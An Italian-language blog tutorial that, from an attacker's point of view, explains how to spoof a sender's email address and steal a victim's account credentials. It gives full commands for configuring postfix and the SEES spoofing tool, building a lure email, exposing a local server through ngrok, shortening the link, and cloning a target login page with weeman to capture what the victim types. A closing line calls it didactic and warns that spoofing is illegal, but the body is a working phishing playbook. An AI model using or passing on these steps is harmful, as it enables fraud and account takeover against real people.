Come sottrarre-occount-email

Come sottrarre-occount-email

Sottrarre-occount-email. Al giorno d’ oggi chiunque possiede un indirizzo Email si sarà visto recapitare almeno una volta dei messaggi di posta strani il cui mittente, in apparenza legittimo, risulta ad un esame più approfondito contraffatto
Ci troviamo di fronte ad un caso di Email spoofing una tecnica che fonda le proprie radici nell’ ingegneria sociale usata da spammer e Hacker per indurre l’ utente ad aprire link malevoli o scaricare file che fungono da payload.

Come un potenziale attacante vi mostrerò un applicazione concreta

sottrarre-occount-email

Vestendo i panni di un potenziale attaccante, vedremo qui un’ applicazione concreta di tale tecnica, finalizzata alla sottrazione di credenziali di un dato account.

Prima di tutto impostiamo il sistema per inviare Email con l’indirizzo e, nome di dominio modificati, in modo da poter invogliare il mittente, tuttavia è importante notare che, l’ IP pubblico sarà comunque rintracciabile negli header della mail.
Per questo scopo il progetto SEES (Social Engineering Email Service) rappresenta un ottimo punto di riferimento.
Utilizziamo una distro Linux come Kali o anche Ubuntu installiamo i pacchetti necessari per il suo corretto funzionamento.

Terminale
  • sudo apt install mailutils
  • sudo apt install postfix

Configuriamo il servizio postfix selezionando nella finestra “impostazioni” la voce Internet Site, quindi specificando il nome di domino che vogliamo mostrare alla vittima quando aprirà la nostra mail contraffatta.

Avviamo il nuovo servizio di sistema lanciando il comando:

Terminale
  • sudo /etc/init.d/postfix start

A questo punto procuriamoci SEES:

Terminale
  • git clone https://github.com/galkan/sees.git

e andiamo a modificare i due file di configurazione che troviamo nel percorso sees/config:

  • mail.user
  • sees.cfg

Occorre specificare qui l’indirizzo mail fasullo e il nome dell’ attacante, oltre all’oggetto e all’ indirizzo mail della vittima.
Ricordiamoci di inserire lo stesso dominio indicato nella fase di configurazione di postfix.

Costruire una mail fasulla

Al percorso sees/data prepariamo invece il contenuto della mail da recapitare attraverso i tag HTML: i dettagli e la veste grafica risulteranno determinanti per la buona riuscita del’ attacco, cerchiamo dunque di essere il più possibile accurati.
Non rimane che predisporre il link malevolo che si desidera far aprire alla vittima, che sarà quello che permetterà di intercettare in seguito le sue credenziali; prima però è necessario preparare un web server in ascolto. Per renderlo operativo anche al di fuori della LAN ci avvarremo di ngrok, un servizio in grado di esporre ada internet un qualsiasi web server senza il bisogno di creare regole di port forwarding nel gateway. Procuriamoci l’ eseguibile per sistemi su base Linuxf all’ indirizzo https://ngrok.com/download.
Da un nuovo terminale scriviamo ngrok (ngrok ti consente di esporre a Internet un server Web in esecuzione sul tuo computer locale. Dì a ngrok su quale porta è in ascolto il tuo server web. )e collochiamo l’ URL generato all’ interno del codice HTML della mail. Per renderlo ancora più credibile, è possibile abbreviarlo o personalizzarlo con un url-shortener.

Terminale
  • Sudo ./ngrok http 8080

Infine, inviamo la mail alla vittima con l’ istruzione:

Terminale
  • python sees.py –text –config_file config/sees.cfg –mail_user config/mail.user –html_file data/html.text -v

Per l’ ultimo step ci serviremo di weeman, un semplice ma efficace tool scritto in python utilizzato per le azioni di phishing. Cloniamo il progetto ed eseguiamo il programma impostando i seguenti parametri:

Terminale
  • git clone https://github.com/samyoyo/weeman.git
  • ./weeman.py
  • set url http://www.SITOINTERCETTARE.com
  • set port 8080
  • set action_url LINKGENERATODANGROK
  • run

Ecco ciò vedrà la vittima una volta aperto il link malevolo dalla nostra mail.
Una volta effettuato il login, l’ output ci restituirà le credenziali inserite dalla vittima sulla finta pagina Web creata con il comando iniziale. Ribadiamo ancora che lo spoofing è severamente punibile dalla legge.

PS. Solo ad uso personale

Queste procedure chiamate spoofing che vi ho illustrato nel’ articolo sono solo per uso dadattico cosi da sapere come si muovono i pirati informatici. Sarete pronti a respingere eventuali attacchi. Ogni utilizzo improprio costituisce un reato attenzione!


Articoli Correlati

e-mail-dal-suo-ip-di-origine
impedire-mail-contrassegno-spam


Grazie! per l’utilizzo della Guida di Linuxiano.

Trovi questo tutorial utile? Condividi con i tuoi amici per tenerlo in vita.
Sii il primo a commentare, apprezzo i tuoi suggerimenti. Per ulteriori domande potete commentare qui sotto.